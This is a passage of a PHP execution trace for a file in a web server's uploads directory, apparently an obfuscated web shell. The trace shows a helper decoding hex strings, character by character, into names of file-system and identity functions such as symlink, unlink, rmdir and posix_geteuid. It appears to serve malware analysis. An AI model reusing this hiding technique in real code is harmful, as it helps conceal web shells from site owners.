2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1346	0	0.050219	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	1346	1	0.050231	722360
3	1346	R			120
3	1347	0	0.050244	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	1347	1	0.050255	722320
3	1347	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1348	0	0.050286	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1348	1	0.050298	722360
3	1348	R			95
3	1349	0	0.050310	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1349	1	0.050321	722320
3	1349	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1350	0	0.050352	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1350	1	0.050364	722360
3	1350	R			103
3	1351	0	0.050376	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1351	1	0.050387	722320
3	1351	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1352	0	0.050417	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1352	1	0.050429	722360
3	1352	R			101
3	1353	0	0.050441	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1353	1	0.050452	722320
3	1353	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1354	0	0.050482	722320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1354	1	0.050494	722368
3	1354	R			116
3	1355	0	0.050506	722288	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1355	1	0.050517	722328
3	1355	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1356	0	0.050547	722320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1356	1	0.050559	722368
3	1356	R			101
3	1357	0	0.050571	722288	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1357	1	0.050583	722328
3	1357	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1358	0	0.050619	722320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1358	1	0.050634	722368
3	1358	R			117
3	1359	0	0.050647	722288	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1359	1	0.050659	722328
3	1359	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1360	0	0.050690	722320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1360	1	0.050701	722368
3	1360	R			105
3	1361	0	0.050713	722288	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1361	1	0.050725	722328
3	1361	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1362	0	0.050754	722320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1362	1	0.050766	722368
3	1362	R			100
3	1363	0	0.050778	722288	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1363	1	0.050789	722328
3	1363	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1337	1	0.050823	722288
2	1337	R			'posix_geteuid'
1		A						/var/www/html/uploads/1CTT.php	7	$func[67] = 'posix_geteuid'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1364	0	0.050859	722288	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'706f7369785f67657465676964'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 25
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1365	0	0.050900	722320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1365	1	0.050912	722368
3	1365	R			112
3	1366	0	0.050925	722288	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1366	1	0.050937	722328
3	1366	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1367	0	0.050967	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1367	1	0.050979	722400
3	1367	R			111
3	1368	0	0.050991	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1368	1	0.051003	722360
3	1368	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1369	0	0.051033	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1369	1	0.051045	722400
3	1369	R			115
3	1370	0	0.051058	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1370	1	0.051069	722360
3	1370	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1371	0	0.051099	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1371	1	0.051111	722400
3	1371	R			105
3	1372	0	0.051123	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1372	1	0.051134	722360
3	1372	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1373	0	0.051164	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	1373	1	0.051176	722400
3	1373	R			120
3	1374	0	0.051188	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	1374	1	0.051200	722360
3	1374	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1375	0	0.051230	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1375	1	0.051242	722400
3	1375	R			95
3	1376	0	0.051254	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1376	1	0.051265	722360
3	1376	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1377	0	0.051295	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1377	1	0.051307	722400
3	1377	R			103
3	1378	0	0.051319	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1378	1	0.051330	722360
3	1378	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1379	0	0.051360	722352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1379	1	0.051372	722400
3	1379	R			101
3	1380	0	0.051385	722320	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1380	1	0.051395	722360
3	1380	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1381	0	0.051425	722360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1381	1	0.051436	722408
3	1381	R			116
3	1382	0	0.051449	722328	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1382	1	0.051460	722368
3	1382	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1383	0	0.051490	722360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1383	1	0.051502	722408
3	1383	R			101
3	1384	0	0.051514	722328	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1384	1	0.051528	722368
3	1384	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1385	0	0.051558	722360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1385	1	0.051570	722408
3	1385	R			103
3	1386	0	0.051582	722328	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1386	1	0.051594	722368
3	1386	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1387	0	0.051624	722360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1387	1	0.051635	722408
3	1387	R			105
3	1388	0	0.051647	722328	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1388	1	0.051659	722368
3	1388	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1389	0	0.051688	722360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1389	1	0.051699	722408
3	1389	R			100
3	1390	0	0.051711	722328	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1390	1	0.051722	722368
3	1390	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1364	1	0.051752	722328
2	1364	R			'posix_getegid'
1		A						/var/www/html/uploads/1CTT.php	7	$func[68] = 'posix_getegid'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1391	0	0.051787	722328	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'616464736c6173686573'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 19
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1392	0	0.051829	722360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1392	1	0.051841	722408
3	1392	R			97
3	1393	0	0.051853	722328	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1393	1	0.051865	722368
3	1393	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1394	0	0.051896	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1394	1	0.051907	722440
3	1394	R			100
3	1395	0	0.051931	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1395	1	0.051944	722400
3	1395	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1396	0	0.051974	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1396	1	0.051986	722440
3	1396	R			100
3	1397	0	0.051998	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1397	1	0.052010	722400
3	1397	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1398	0	0.052039	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1398	1	0.052051	722440
3	1398	R			115
3	1399	0	0.052064	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1399	1	0.052075	722400
3	1399	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1400	0	0.052105	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1400	1	0.052116	722440
3	1400	R			108
3	1401	0	0.052129	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1401	1	0.052140	722400
3	1401	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1402	0	0.052170	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1402	1	0.052182	722440
3	1402	R			97
3	1403	0	0.052194	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1403	1	0.052206	722400
3	1403	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1404	0	0.052236	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1404	1	0.052248	722440
3	1404	R			115
3	1405	0	0.052264	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1405	1	0.052276	722400
3	1405	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1406	0	0.052306	722392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	1406	1	0.052318	722440
3	1406	R			104
3	1407	0	0.052330	722360	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	1407	1	0.052342	722400
3	1407	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1408	0	0.052372	722400	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1408	1	0.052383	722448
3	1408	R			101
3	1409	0	0.052396	722368	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1409	1	0.052407	722408
3	1409	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1410	0	0.052438	722400	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1410	1	0.052449	722448
3	1410	R			115
3	1411	0	0.052462	722368	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1411	1	0.052473	722408
3	1411	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1391	1	0.052503	722368
2	1391	R			'addslashes'
1		A						/var/www/html/uploads/1CTT.php	7	$func[69] = 'addslashes'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1412	0	0.052538	722368	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'73796d6c696e6b'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1413	0	0.052579	722400	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1413	1	0.052591	722448
3	1413	R			115
3	1414	0	0.052603	722368	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1414	1	0.052615	722408
3	1414	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1415	0	0.052645	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	1415	1	0.052657	722480
3	1415	R			121
3	1416	0	0.052669	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	1416	1	0.052680	722440
3	1416	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1417	0	0.052710	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1417	1	0.052722	722480
3	1417	R			109
3	1418	0	0.052735	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1418	1	0.052746	722440
3	1418	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1419	0	0.052776	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1419	1	0.052788	722480
3	1419	R			108
3	1420	0	0.052800	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1420	1	0.052812	722440
3	1420	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1421	0	0.052842	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1421	1	0.052854	722480
3	1421	R			105
3	1422	0	0.052866	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1422	1	0.052877	722440
3	1422	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1423	0	0.052907	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1423	1	0.052919	722480
3	1423	R			110
3	1424	0	0.052931	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1424	1	0.052942	722440
3	1424	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1425	0	0.052972	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6b'
3	1425	1	0.052987	722480
3	1425	R			107
3	1426	0	0.053000	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	107
3	1426	1	0.053011	722440
3	1426	R			'k'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1412	1	0.053042	722400
2	1412	R			'symlink'
1		A						/var/www/html/uploads/1CTT.php	7	$func[70] = 'symlink'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1427	0	0.053075	722400	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'726d646972'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1428	0	0.053116	722432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1428	1	0.053127	722480
3	1428	R			114
3	1429	0	0.053140	722400	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1429	1	0.053151	722440
3	1429	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1430	0	0.053181	722464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1430	1	0.053193	722512
3	1430	R			109
3	1431	0	0.053205	722432	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1431	1	0.053216	722472
3	1431	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1432	0	0.053247	722464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1432	1	0.053259	722512
3	1432	R			100
3	1433	0	0.053271	722432	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1433	1	0.053282	722472
3	1433	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1434	0	0.053312	722464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1434	1	0.053324	722512
3	1434	R			105
3	1435	0	0.053336	722432	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1435	1	0.053347	722472
3	1435	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1436	0	0.053377	722464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1436	1	0.053388	722512
3	1436	R			114
3	1437	0	0.053401	722432	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1437	1	0.053412	722472
3	1437	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1427	1	0.053442	722432
2	1427	R			'rmdir'
1		A						/var/www/html/uploads/1CTT.php	7	$func[71] = 'rmdir'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1438	0	0.053475	722432	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'756e6c696e6b'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1439	0	0.053515	722464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1439	1	0.053527	722512
3	1439	R			117
3	1440	0	0.053539	722432	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1440	1	0.053550	722472
3	1440	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1441	0	0.053580	722496	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1441	1	0.053592	722544
3	1441	R			110
3	1442	0	0.053604	722464	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1442	1	0.053616	722504
3	1442	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1443	0	0.053646	722496	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1443	1	0.053657	722544
3	1443	R			108
3	1444	0	0.053670	722464	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1444	1	0.053681	722504
3	1444	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1445	0	0.053715	722496	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1445	1	0.053727	722544
3	1445	R			105
3	1446	0	0.053739	722464	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1446	1	0.053750	722504
3	1446	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1447	0	0.053780	722496	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1447	1	0.053791	722544
3	1447	R			110
3	1448	0	0.053803	722464	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1448	1	0.053814	722504
3	1448	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1449	0	0.053844	722496	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6b'
3	1449	1	0.053855	722544
3	1449	R			107
3	1450	0	0.053868	722464	chr	0		/var/www/html/uploads/1CTT.php	204	1	107
3	1450	1	0.053879	722504
3	1450	R			'k'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1438	1	0.053909	722464
2	1438	R			'unlink'
1		A						/var/www/html/uploads/1CTT.php	7	$func[72] = 'unlink'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1451	0	0.053943	722464	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'61727261795f6d6170'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1452	0	0.053984	722496	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1452	1	0.053996	722544
3	1452	R			97
3	1453	0	0.054008	722464	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1453	1	0.054020	722504
3	1453	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1454	0	0.054051	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1454	1	0.054063	722576
3	1454	R			114
3	1455	0	0.054075	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1455	1	0.054087	722536
3	1455	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1456	0	0.054117	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1456	1	0.054129	722576
3	1456	R			114
3	1457	0	0.054141	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1457	1	0.054153	722536
3	1457	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1458	0	0.054182	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1458	1	0.054194	722576
3	1458	R			97
3	1459	0	0.054207	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1459	1	0.054218	722536
3	1459	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1460	0	0.054248	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	1460	1	0.054259	722576
3	1460	R			121
3	1461	0	0.054272	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	1461	1	0.054283	722536
3	1461	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1462	0	0.054313	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1462	1	0.054325	722576
3	1462	R			95
3	1463	0	0.054338	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1463	1	0.054349	722536
3	1463	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1464	0	0.054379	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1464	1	0.054391	722576
3	1464	R			109
3	1465	0	0.054403	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1465	1	0.054417	722536
3	1465	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1466	0	0.054447	722528	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1466	1	0.054459	722576
3	1466	R			97
3	1467	0	0.054472	722496	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1467	1	0.054483	722536
3	1467	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1468	0	0.054513	722536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1468	1	0.054524	722584
3	1468	R			112
3	1469	0	0.054537	722504	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1469	1	0.054549	722544
3	1469	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1451	1	0.054579	722504
2	1451	R			'array_map'
1		A						/var/www/html/uploads/1CTT.php	7	$func[73] = 'array_map'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1470	0	0.054620	722504	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'676c6f62'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1471	0	0.054664	722536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1471	1	0.054677	722584
3	1471	R			103
3	1472	0	0.054689	722504	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1472	1	0.054701	722544
3	1472	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1473	0	0.054732	722568	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1473	1	0.054743	722616
3	1473	R			108
3	1474	0	0.054756	722536	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1474	1	0.054767	722576
3	1474	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1475	0	0.054797	722568	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1475	1	0.054809	722616
3	1475	R			111
3	1476	0	0.054821	722536	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1476	1	0.054833	722576
3	1476	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1477	0	0.054863	722568	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	1477	1	0.054875	722616
3	1477	R			98
3	1478	0	0.054887	722536	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	1478	1	0.054898	722576
3	1478	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1470	1	0.054928	722536
2	1470	R			'glob'
1		A						/var/www/html/uploads/1CTT.php	7	$func[74] = 'glob'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1479	0	0.054962	722536	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'686561646572'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1480	0	0.055002	722568	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	1480	1	0.055014	722616
3	1480	R			104
3	1481	0	0.055026	722536	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
